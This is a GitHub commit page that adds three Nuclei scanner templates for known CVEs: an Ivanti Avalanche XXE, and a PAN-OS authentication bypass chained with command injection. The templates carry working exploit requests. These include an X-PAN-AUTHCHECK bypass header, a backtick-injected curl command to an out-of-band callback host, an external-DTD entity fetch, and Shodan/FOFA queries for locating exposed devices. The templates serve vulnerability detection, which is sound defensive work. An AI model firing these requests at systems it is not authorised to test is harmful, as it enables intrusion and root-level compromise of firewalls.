-
-
Notifications
You must be signed in to change notification settings - Fork 189
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Auto Update Nuclei [Wed Nov 20 06:29:46 UTC 2024] :robot:
- Loading branch information
1 parent
333f529
commit aadab7c
Showing
3 changed files
with
188 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,55 @@ | ||
id: CVE-2024-38653 | ||
|
||
info: | ||
name: Ivanti Avalanche SmartDeviceServer - XML External Entity | ||
author: DhiyaneshDK | ||
severity: high | ||
description: | | ||
XXE in SmartDeviceServer in Ivanti Avalanche 6.3.1 allows a remote unauthenticated attacker to read arbitrary files on the server. | ||
reference: | ||
- https://github.com/D4mianWayne/POCs/tree/main/CVE%202024-38653 | ||
- https://github.com/fkie-cad/nvd-json-data-feeds | ||
- https://nvd.nist.gov/vuln/detail/cve-2024-38653 | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N | ||
cvss-score: 7.5 | ||
cve-id: CVE-2024-38653 | ||
cwe-id: CWE-611 | ||
epss-score: 0.00697 | ||
epss-percentile: 0.80671 | ||
cpe: cpe:2.3:a:ivanti:avalanche:6.3.1:*:*:*:premise:*:*:* | ||
metadata: | ||
max-request: 1 | ||
vendor: ivanti | ||
product: avalanche | ||
tags: cve,cve2024,intrusive,ivanti,avalanche,xxe | ||
|
||
variables: | ||
filename: "{{to_lower(rand_text_alpha(5))}}" | ||
|
||
http: | ||
- raw: | ||
- | | ||
PUT /mdm/checkin HTTP/1.1 | ||
Host: {{Hostname}} | ||
Content-Type: application/xml | ||
<?xml version="1.0" ?> | ||
<!DOCTYPE a [ | ||
<!ENTITY % asd SYSTEM "http://{{interactsh-url}}/{{filename}}.dtd"> | ||
%asd; | ||
%c; | ||
]> | ||
<a></a> | ||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
part: interactsh_protocol | ||
words: | ||
- "http" | ||
|
||
- type: word | ||
part: interactsh_request | ||
words: | ||
- "User-Agent: Java" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,46 @@ | ||
id: CVE-2024-0012 | ||
|
||
info: | ||
name: PAN-OS Management Web Interface - Authentication Bypass | ||
author: johnk3r,watchtowr | ||
severity: critical | ||
description: | | ||
An authentication bypass in Palo Alto Networks PAN-OS software enables an unauthenticated attacker with network access to the management web interface to gain PAN-OS administrator privileges to perform administrative actions, tamper with the configuration, or exploit other authenticated privilege escalation vulnerabilities | ||
reference: | ||
- https://security.paloaltonetworks.com/CVE-2024-0012 | ||
- https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve-2024-0012-and-cve-2024-9474/ | ||
- https://nvd.nist.gov/vuln/detail/CVE-2024-0012 | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | ||
cvss-score: 9.8 | ||
cve-id: CVE-2024-0012 | ||
cwe-id: CWE-306 | ||
epss-score: 0.01216 | ||
epss-percentile: 0.85843 | ||
cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:* | ||
metadata: | ||
verified: true | ||
max-request: 1 | ||
vendor: paloaltonetworks | ||
product: pan-os | ||
fofa-query: icon_hash="-631559155" | ||
shodan-query: | ||
- cpe:"cpe:2.3:o:paloaltonetworks:pan-os" | ||
- http.favicon.hash:"-631559155" | ||
tags: cve,cve2024,paloalto,globalprotect,kev | ||
|
||
http: | ||
- raw: | ||
- | | ||
GET /php/ztp_gate.php/.js.map HTTP/1.1 | ||
Host: {{Hostname}} | ||
X-PAN-AUTHCHECK: off | ||
matchers: | ||
- type: dsl | ||
dsl: | ||
- 'contains_any(body, "<title>Zero Touch Provisioning", "Zero Touch Provisioning (ZTP)")' | ||
- 'contains(body, "/scripts/cache/mainui.javascript")' | ||
- 'contains(header, "PHPSESSID=")' | ||
- 'status_code == 200' | ||
condition: and |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,87 @@ | ||
id: CVE-2024-9474 | ||
|
||
info: | ||
name: PAN-OS Management Web Interface - Command Injection | ||
author: watchTowr,iamnoooob,rootxharsh,pdresearch | ||
severity: high | ||
description: | | ||
A privilege escalation vulnerability in Palo Alto Networks PAN-OS software allows a PAN-OS administrator with access to the management web interface to perform actions on the firewall with root privileges. | ||
Cloud NGFW and Prisma Access are not impacted by this vulnerability. | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H | ||
cvss-score: 7.2 | ||
cve-id: CVE-2024-9474 | ||
cwe-id: CWE-78 | ||
epss-score: 0.02252 | ||
epss-percentile: 0.89926 | ||
cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:* | ||
metadata: | ||
verified: true | ||
max-request: 3 | ||
vendor: paloaltonetworks | ||
product: pan-os | ||
shodan-query: | ||
- cpe:"cpe:2.3:o:paloaltonetworks:pan-os" | ||
- http.favicon.hash:"-631559155" | ||
fofa-query: icon_hash="-631559155" | ||
tags: cve,cve2024,panos,rce,kev | ||
|
||
flow: http(1) && http(2) && http(3) | ||
|
||
variables: | ||
rand: "{{to_lower(rand_text_alpha(5))}}" | ||
|
||
http: | ||
- raw: | ||
- | | ||
GET /php/utils/CmsGetDeviceSoftwareVersion.php/.js.map HTTP/1.1 | ||
Host: {{Hostname}} | ||
X-PAN-AUTHCHECK: off | ||
matchers: | ||
- type: dsl | ||
dsl: | ||
- 'status_code == 200' | ||
- 'contains(body, "0.0.0")' | ||
- 'contains_all(header, "Expires: 0", "PHPSESSID=", "application/json")' | ||
condition: and | ||
internal: true | ||
|
||
- raw: | ||
- | | ||
POST /php/utils/createRemoteAppwebSession.php/{{rand}}.js.map HTTP/1.1 | ||
Host: {{Hostname}} | ||
X-PAN-AUTHCHECK: off | ||
Content-Type: application/x-www-form-urlencoded | ||
user=`curl+{{interactsh-url}}`&userRole=superuser&remoteHost=&vsys=vsys1 | ||
matchers: | ||
- type: word | ||
part: body | ||
words: | ||
- "@start@PHPSESSID=" | ||
internal: true | ||
|
||
extractors: | ||
- type: regex | ||
part: body | ||
name: phpsessid | ||
group: 1 | ||
regex: | ||
- '@start@PHPSESSID=(.*?)@end@' | ||
internal: true | ||
|
||
- raw: | ||
- | | ||
GET /index.php/.js.map HTTP/1.1 | ||
Host: {{Hostname}} | ||
Cookie: PHPSESSID={{phpsessid}} | ||
X-PAN-AUTHCHECK: off | ||
matchers: | ||
- type: dsl | ||
dsl: | ||
- 'contains(interactsh_protocol, "dns")' | ||
- 'contains(body, "panos")' | ||
condition: and |